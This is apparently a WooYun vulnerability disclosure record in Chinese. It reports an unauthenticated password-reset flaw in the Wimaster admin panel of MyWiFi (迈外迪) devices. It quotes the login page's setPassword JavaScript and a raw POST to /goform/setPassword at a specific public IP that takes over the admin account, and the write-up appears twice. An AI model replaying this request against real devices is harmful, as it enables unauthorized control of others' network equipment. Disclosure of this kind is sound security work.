当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131933

漏洞标题:迈外迪wifi的Wimaster未授权直接修改密码登陆

相关厂商:迈外迪

漏洞作者: 路人甲

提交时间:2015-08-05 22:19

修复时间:2015-09-20 12:26

公开时间:2015-09-20 12:26

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

不知道密码,知道登录后台

详细说明:

// 设置密码
var setPassword = function() {
for (var i in setPwd) {
if (!setPwd[i].checked) {
$('.login-first-box #error-tips').text(setPwd[i].tip);
return;
}
}
$.ajax({
type: 'post',
url : "/goform/setPassword", // 后台提交地址
data : {
password : setPwd['password'].value // 提交数据
},
success : function(res) {
res = res.replace(/\r\n/ig,"");
if (res == "success") {
location.href = "/index.asp";
}
else if(res == "samedef")
{
$('.login-first-box #error-tips').text('请勿使用默认密码');
}
else {
location.href = "/login.asp";
}
}
});
};


这是登录页面其中的首次设置密码页面
找到的一个地址:http://120.199.13.190/login.asp
不知道密码,然后设置密码为a123456
根据上面构造post请求

POST http://120.199.13.190/goform/setPassword HTTP/1.1
User-Agent: Fiddler
Host: 120.199.13.190
Content-Length: 15
password=a123456


QQ截图20150805190649.png


QQ截图20150805190743.png


然后就成功登录了后台管理地址

漏洞证明:

// 设置密码
var setPassword = function() {
for (var i in setPwd) {
if (!setPwd[i].checked) {
$('.login-first-box #error-tips').text(setPwd[i].tip);
return;
}
}
$.ajax({
type: 'post',
url : "/goform/setPassword", // 后台提交地址
data : {
password : setPwd['password'].value // 提交数据
},
success : function(res) {
res = res.replace(/\r\n/ig,"");
if (res == "success") {
location.href = "/index.asp";
}
else if(res == "samedef")
{
$('.login-first-box #error-tips').text('请勿使用默认密码');
}
else {
location.href = "/login.asp";
}
}
});
};


这是登录页面其中的首次设置密码页面
找到的一个地址:http://120.199.13.190/login.asp
不知道密码,然后设置密码为a123456
根据上面构造post请求

POST http://120.199.13.190/goform/setPassword HTTP/1.1
User-Agent: Fiddler
Host: 120.199.13.190
Content-Length: 15
password=a123456


QQ截图20150805190649.png


QQ截图20150805190743.png


然后就成功登录了后台管理地址

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-06 12:25

厂商回复:

感谢白帽子反馈问题,已改进。

最新状态:

暂无


漏洞评价:

评论